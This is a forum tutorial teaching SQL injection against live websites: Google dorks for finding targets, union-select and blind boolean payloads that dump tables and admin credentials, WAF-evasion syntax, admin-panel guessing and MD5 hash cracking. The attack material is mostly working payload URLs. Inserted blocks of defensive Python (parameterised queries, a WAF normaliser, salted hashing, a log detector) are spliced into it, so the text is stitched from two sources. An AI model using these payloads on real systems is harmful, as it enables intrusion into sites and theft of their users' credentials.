Hello Great JomGegar.com! As earlier promised, I am going to try and give an in-dept detailed and basic SQL Injection tutorial. I presume most of you are noobs to SQL Injection. So let's do a quick recap on what SQL Injection really is all about.
What Is an SQL Injection?
An SQL Injection is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information, such as Emails, Usernames, Passwords, etc. In this Tutorial, we'll be looking for the Admin Panel's credentials.
Please note that I said 'Admin Panel', not 'control panel'. It is a well known fact that, while performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.
Finding a Vulnerable Site:
The easiest way to find vulnerable sites is by using Dorks. Yes! Google is your best friend here, it's the best way. A dork looks something like this:
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=
There are tons and tons of others Dorks so you will definitely find your pick if you want to find a good site to exploit with SQL Injection.
Exploiting the Database:
Ok. Here we go deeper into the fun world of an SQL Injection! First off, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name (not real site pls n00bie) for my Example:
http://www.couldbevulnerablesite.com/event.php?id=1
Please note that our site has to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:
http://www.couldbevulnerablesite.com/event.php?id=1'
If per chance we get a MySQL error, then our site is probably vulnerable. On the other hand, if it just refreshes the page normally, then our site is not vulnerable to injection.
Finding the number of columns:
Assuming our site is vulnerable to SQL Injection, we will go ahead and commence getting the Info out of the Database. However, before we can do that, we have to find out which columns are vulnerable to SQL Injection. So far we don't know how many columns there are yet, so we need to take care of that first.
In order to find the number of columns we need to use a command known as 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:
http://www.couldbevulnerablesite.com/event.php?id=1 order by 2--
Right! So now, if the site just refreshed to its normal state, that's good. We didn't get an error, so we have to continue until we get an error.
http://www.hopefully.../event.php?id=1 order by 3--
*No Error*
http://www.hopefully.../event.php?id=1 order by 4--
*No Error*
http://www.hopefully.../event.php?id=1 order by 5--
*Error*
Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.
Important:
Please note that the two hyphens (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and it will execute. So we need those at the end of every command.
Finding the vulnerable column:
Cool! So we now have the number of columns, then what? We just need to find out which one/s are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,2,3,4--
At this point a couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers are the columns that are vulnerable to SQL Injection, so those are the columns we need to execute our commands in. Let's say that column 2 appeared on the page. We will be executing commands in column 2.
Important:
You HAVE to have the - after the =. That is extremely important.
Determining the Version of the MySQL Database:
I know. I know you may be wondering why the bloomingdales we need the version, right? Well it's simply because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.
Remember our vulnerable column is 2. In other words that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--
To which it should display the Version on the page, looking something like this:
5.1.47-community-log
Bang! The numbers don't matter though, as long as they're at least 5, or over.
Finding the name of the Database:
The Database name is very important to the attacker. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:
http://couldbevulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
Sometimes, that command will show you more than the Database name, but all we really want is the database name, so the better command would preferably be:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--
Voila! You now have the Database name. Bravo! See how far we made it. We are not n00bs anymore. Over to more excitement!
Viewing the Tables in the Database:
The tables are what contain the information about the target site; that's why we need to view them, so we can get the information we seek.
The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
Just hit 'enter' and the Tables in the Database will be displayed right before your eyes.
Viewing the Tables' information:
We will most likely be given many tables. It is up to you to decide which one contains the valuable information, so it can at times be difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"--
For that query, you will almost always get an error. So instead, convert the 'admin_credentials' to Hex.
To do that, I recommend this site:
http://www.swingnote...s/texttohex.php
Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:
http://www.couldbevulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73--
Important:
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will not work.
Displaying the Contents:
There will still be some tables inside the Table you've chosen. So you need to get the information, and that will usually mean bye-bye Tables, and Hello 'Admin Panel' access.
Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--
That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. And where it says admin_credentials, you need to put the table that you are inside of.
Now we should have all the credentials, so we just need to find the Admin Login.
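The whole chain above only works because the site pastes the id parameter straight into its SQL text. Added example, not code from the original post: a throwaway SQLite database (table and column names constructed to match the tutorial's four-column event page and its admin_credentials table) run against the tutorial's own probes, with the string-built query beside the parameterised one that defeats them.

```python
import sqlite3


def make_db():
    """Throwaway in-memory database standing in for the tutorial's site.
    The event table has the four columns the ORDER BY probe finds; the
    admin_credentials table with user/userpword mirrors the post's example.
    All names and values are constructed for this demo."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE event(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        INSERT INTO event VALUES (1, 'Launch party', 'Doors open at 8', 'editor');
        CREATE TABLE admin_credentials(user TEXT, userpword TEXT);
        INSERT INTO admin_credentials VALUES ('admin', 'constructed-not-a-real-hash');
    """)
    return con


def vulnerable_lookup(con, raw_id):
    """The pattern the whole tutorial depends on: the id parameter is pasted
    straight into the SQL text.  Database errors are returned as a string so
    the caller can see the 'MySQL error' the post uses as its first test."""
    sql = "SELECT id, title, body, author FROM event WHERE id=" + raw_id
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def safe_lookup(con, raw_id):
    """Hardened form: the value is checked to be an integer and then bound as
    a query parameter, so it can never be parsed as SQL syntax."""
    try:
        event_id = int(raw_id)
    except ValueError:
        return []  # reject anything that is not a plain number
    return con.execute(
        "SELECT id, title, body, author FROM event WHERE id=?", (event_id,)
    ).fetchall()


# Constructed inputs, in the order the tutorial tries them.
PROBES = [
    "1",
    "1'",
    "1 order by 4--",
    "1 order by 5--",
    "-1 union select 1,2,3,4--",
    "-1 union select 1,group_concat(userpword),3,4 from admin_credentials--",
]


def compare(con):
    """Run every probe through both lookups; returns {probe: (vulnerable, safe)}."""
    return {p: (vulnerable_lookup(con, p), safe_lookup(con, p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (vuln, safe) in compare(make_db()).items():
        print(f"{probe!r:72} vulnerable={vuln!r}  safe={safe!r}")
```

The quote, the out-of-range ORDER BY and the UNION all behave exactly as the post describes against the string-built query, and all fall to an empty result against the parameterised one.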
Finding the Admin Login:
Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin.
Like this:
http://www.couldbevulnerablesite.com/admin
http://www.couldbevulnerablesite.com/admin.php
http://www.couldbevulnerablesite.com/login.php
http://www.couldbevulnerablesite.com/admin/index.php
http://www.couldbevulnerablesite.com/login/index.php
http://www.couldbevulnerablesite.com/adminlogin
http://www.couldbevulnerablesite.com/adminlogin.php
http://www.couldbevulnerablesite.com/adminlogin/index.php
http://www.couldbevulnerablesite.com/moderator.php
http://www.couldbevulnerablesite.com/moderator
http://www.couldbevulnerablesite.com/modlogin
And there's plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it is more glorifying after hacking the Website.
WAF By-Passing:
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
WAF stands for Web Application Firewall. A Web Application Firewall is put in place so that the website will be secure from attacks such as SQL Injection, XSS, and other exploitation methods. The WAF filters commands put through to the Database, and detects attacks against the site.
A WAF Error will look like this:
FORBIDDEN You are not allowed to access "" on this server *INFORMATION ABOUT THE WEBSERVER IS HERE*
If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
There are several methods on how to by-pass the WAF, I will be explaining a few:
(a) You don't have to worry about getting the number of columns, the Firewalls don't block that; however, they DO block the union select command, so here is method 1 on how to By-Pass the Firewall.
The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--
That will by-pass the Firewall. However, we still have several steps because we still need the other information from the tables and columns. Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--
To make matters simple in this tutorial, we'll be grabbing more information with just one command. So let's try it like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--
Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name.
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--
Now, that will be displaying all the tables. Now, to access the table's information, we're going to use this command to by-pass the firewall:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--
There we go! Now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*--
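A filter that only looks for the literal text "union select" is exactly what the /*!UNION*/ and CoNcAt tricks above walk past. Added example, not from the original post: a normaliser that strips the MySQL /*!...*/ wrappers, URL encoding, comment-as-whitespace and mixed case before matching signatures on the cleaned-up query. The request lines are constructed and copy the payload shapes shown in this tutorial.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (path + query only), as a reverse proxy
# or WAF would receive them.  They copy the shapes used in this tutorial.
SAMPLE_REQUESTS = [
    "/event.php?id=1",
    "/event.php?id=1 order by 5--",
    "/event.php?id=-1 union select 1,2,3,4--",
    "/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user()),3--",
    "/event.php?id=-1%20/*!UNION*/%20/*!SELECT*/%201,Group_Concat(column_name),3%20from%20"
    "/*!information_schema*/.columns%20where%20table_name=0x61646d696e5f63726564656e7469616c73--",
    "/news.php?id=5 and substring(@@version,1,1)=5",
]

INLINE_COMMENT = re.compile(r"/\*!\s*(.*?)\s*\*/", re.S)   # MySQL /*!keyword*/ wrappers
OTHER_COMMENT = re.compile(r"/\*.*?\*/", re.S)             # plain /* */ used as a space


def normalise(query):
    """Undo the layers a naive keyword filter trips over: URL encoding,
    /*!keyword*/ wrappers, comment-as-space, mixed case and runs of whitespace."""
    q = unquote_plus(query)
    q = INLINE_COMMENT.sub(r"\1", q)      # /*!UNION*/  ->  UNION
    q = OTHER_COMMENT.sub(" ", q)         # /**/        ->  space
    q = q.lower()                         # CoNcAt      ->  concat
    return re.sub(r"\s+", " ", q).strip()


# Signatures are written against the normalised form, so the case and
# comment tricks no longer matter.  Names are constructed for this demo.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?\bselect\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--"),
    "schema_enum": re.compile(r"\binformation_schema\b\s*\.\s*(tables|columns|schemata)"),
    "version_probe": re.compile(r"@@version|\bversion\s*\("),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b"),
    "comment_terminator": re.compile(r"--\s*$"),
}


def classify(request_line):
    """Return the names of the signatures that fire for one request line."""
    q = normalise(request_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def report(lines):
    """Map every request line to the signatures it triggers."""
    return {line: classify(line) for line in lines}


if __name__ == "__main__":
    for line, hits in report(SAMPLE_REQUESTS).items():
        print(hits or "clean", "<-", normalise(line))
```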
That's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert. If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!
Cracking Hashes:
What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. People encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.
There are many types of hashes, but the most popular to this day is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords and compare them to the Hash; there is no official way to decrypt them in any other way.
The best site you'll find on decrypting a Hash, would definitely be:
http://www.md5decrypter.co.uk/
But, if you've got some time on your hands, and if you would like a better decryption, I recommend using Cain & Abel. You can perform a dictionary attack on the MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the knowledge of the Webmaster. Some people use random strings of numerals and letters, in which case you'd have to Bruteforce, which would be much more of a hassle.
There are plenty of Wordlists that you can find online. If you can't find any, PM me and I'll give you a link.
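Added example, not from the original post, showing both sides of what this section describes: the hash-and-compare dictionary attack that works against an unsalted MD5 (and is why the online lookup sites work at all), next to salted, iterated PBKDF2 storage, under which two users with the same password get different hashes and the same wordlist has to be re-run per user at a much higher cost. The wordlist and passwords are constructed.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed wordlist for the demo.
WORDLIST = ["123456", "password", "letmein", "jomgegar", "qwerty"]


def md5_hex(pw: str) -> str:
    """Unsalted MD5, the storage scheme the section above is about."""
    return hashlib.md5(pw.encode()).hexdigest()


def dictionary_attack_md5(stored_hex: str, wordlist) -> Optional[str]:
    """Exactly what the post describes: hash each candidate and compare.
    One cheap MD5 per candidate, and because there is no salt the same
    precomputed table answers for every site and every user."""
    for candidate in wordlist:
        if md5_hex(candidate) == stored_hex:
            return candidate
    return None


ITERATIONS = 100_000  # PBKDF2 work factor; raise it as hardware gets faster


def store_password(pw: str) -> dict:
    """Defender's side: random per-user salt plus PBKDF2-HMAC-SHA256.
    The record is what you would keep in the users table instead of md5."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "hash": dk.hex(), "iterations": ITERATIONS}


def verify_password(pw: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    dk = hashlib.pbkdf2_hmac(
        "sha256", pw.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(dk.hex(), record["hash"])


def same_password_same_hash(pw: str):
    """Two users choose the same password.  Returns (md5_equal, pbkdf2_equal):
    identical under MD5 (one lookup cracks both), different under salted
    PBKDF2 (each record has to be attacked on its own)."""
    a, b = store_password(pw), store_password(pw)
    return md5_hex(pw) == md5_hex(pw), a["hash"] == b["hash"]


if __name__ == "__main__":
    print("md5 dictionary hit:", dictionary_attack_md5(md5_hex("letmein"), WORDLIST))
    print("md5 equal / pbkdf2 equal:", same_password_same_hash("letmein"))
```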
Manual SQL Injection: MYSQL
Blind injection is a little more complicated than classic injection, but it can be done.
Let's start with advanced stuff.
I will be using our example:
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc. Then, when we want to test it for a blind SQL injection attack:
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok. now the real test:
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select doesn't work, we use a subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
If page loads normally then sub-selects work. Then we are going to see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.
3) Check table and column names
This is the part where guessing is your best friend.
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exists.
if you get FALSE (some article missing), just change the table name until you guess the right one.
let's say that we have found that the table name is users, now what we need is the column name. The same as with the table name, we start guessing. Like I said before, try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that the column name is password (if we get FALSE then try common names or just guess). Here we merge 1 with the column password, then substring returns the first character (,1,1), which is that 1.
4) Pull data from database
we found table users and columns username, password, so we're going to pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok, this here pulls the first character from the first user in table users. substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ascii value and then we compare it with the greater-than symbol >
so if the ascii char is greater than 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'. then let's check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
FALSE!!! Bonza!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far, so keep incrementing until you get to the end (when >0 returns FALSE we know that we have reached the end). There are some tools for Blind SQL Injection, I think sqlmap is the best, but I'm doing everything manually, because that makes you a better SQL INJECTOR.

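The blind oracle above is hard to spot one request at a time but easy to spot as a pattern: one client, one page, a run of near-identical queries that differ only in a number, with the response size flipping between the TRUE page and the FALSE page. Added example, not part of the original post: the access-log lines and the client address 198.51.100.7 are constructed to mirror the probes shown in this section.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Common-log-format line; only GET requests matter for this demo.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/1\.[01]" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)$'
)

# Constructed sample: one ordinary visitor, then one client walking the
# character-by-character oracle.  The byte count swings between the full
# article (TRUE, 5120) and the page with content missing (FALSE, 1830).
PROBE = "/news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E"
SAMPLE_LOG = "\n".join([
    '203.0.113.4 - - [10/Oct/2012:13:55:36 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2012:13:56:01 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2012:13:56:02 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 1830',
    f'198.51.100.7 - - [10/Oct/2012:13:56:10 +0000] "GET {PROBE}80 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Oct/2012:13:56:11 +0000] "GET {PROBE}95 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Oct/2012:13:56:12 +0000] "GET {PROBE}98 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Oct/2012:13:56:13 +0000] "GET {PROBE}99 HTTP/1.1" 200 1830',
])

NUMBER = re.compile(r"\b\d+\b")
# Shapes used as a boolean oracle in this section: "and 1=1", ascii(substring(
# and substring(@@version.  Constructed for the demo, extend as needed.
ORACLE_HINTS = re.compile(
    r"\band\s+\d+=\d+\b|\bascii\s*\(\s*substring\s*\(|\bsubstring\s*\(\s*@@version", re.I
)


def parse(line):
    """One log line -> dict with the URL-decoded query, or None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(rec["path"])
    rec["bytes"] = int(rec["bytes"])
    return rec


def template(query):
    """Replace every number with N so probes that differ only in the compared
    value (>80, >95, >98 ...) or the character index (,1,1 / ,2,1) collapse
    into one key."""
    return NUMBER.sub("N", query.lower())


def find_oracles(log_text, min_probes=3):
    """Group by (client, template).  A client repeating one boolean-shaped query
    many times while the page flips between two sizes is the oracle at work."""
    groups = defaultdict(lambda: {"hits": 0, "sizes": set(), "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or not ORACLE_HINTS.search(rec["query"]):
            continue
        g = groups[(rec["ip"], template(rec["query"]))]
        g["hits"] += 1
        g["sizes"].add(rec["bytes"])
        g["first"] = g["first"] or rec["ts"]
        g["last"] = rec["ts"]
    return {key: g for key, g in groups.items()
            if g["hits"] >= min_probes and len(g["sizes"]) >= 2}


if __name__ == "__main__":
    for (ip, tmpl), g in find_oracles(SAMPLE_LOG).items():
        print(f"{ip}: {g['hits']} probes, sizes {sorted(g['sizes'])}, {g['first']} .. {g['last']}")
        print("  template:", tmpl)
```

Lowering min_probes to 2 also surfaces the "and 1=1 / and 1=2" pair this section opens with; in production the threshold is tuned to the site's normal traffic.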
Just So You Know:
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
SQL Injection IS ILLEGAL. So whatever you do with it, is your responsibility, not mine. You can get in lots of trouble for an SQL Injection. Check out the Proxies and Socks section for protection while hacking a site.
Credit 2 Zer0Pwn 4 his thoughts on some of the segments.
Credit 2 Cold Maniac for Teaching me Blind Injection...
Long Live JomGegar.com....